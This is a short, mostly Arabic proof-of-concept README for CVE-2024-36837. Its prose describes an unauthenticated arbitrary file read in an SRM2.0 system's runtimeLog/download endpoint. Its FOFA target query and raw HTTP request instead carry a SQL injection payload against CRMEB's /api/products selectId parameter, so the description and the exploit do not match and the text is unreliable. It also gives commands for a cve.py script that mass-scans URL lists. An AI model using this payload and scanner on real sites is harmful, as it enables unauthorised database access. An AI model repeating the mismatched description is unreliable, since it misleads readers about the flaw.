
CVE-2024-36837 POC
#CVE-2024-36837
#توجد ثغرة قراءة ملفات تعسفية (Arbitrary File Read) في واجهة runtimeLog/download في نظام 智联云采 SRM2.0، ويمكن للمهاجم غير المصادق عليه استغلال هذه الثغرة لقراءة ملفات مهمة في النظام (مثل ملفات إعداد قاعدة البيانات وملفات إعداد النظام) وغيرها، مما يجعل الموقع في حالة غير آمنة للغاية.
صيغة fofa: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
#POC:
GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip #أضف http:// أو https:// قبل عنوان url python 11.py
#طريقة الاستخدام python cve.py -h
#الفحص الجماعي يجب أن يبدأ عنوان url في ملف url.txt بـ http:// أو https:// python cve.py -f url.txt
#الفحص الفردي يجب أن يبدأ عنوان url بـ http:// أو https:// python cve.py -u url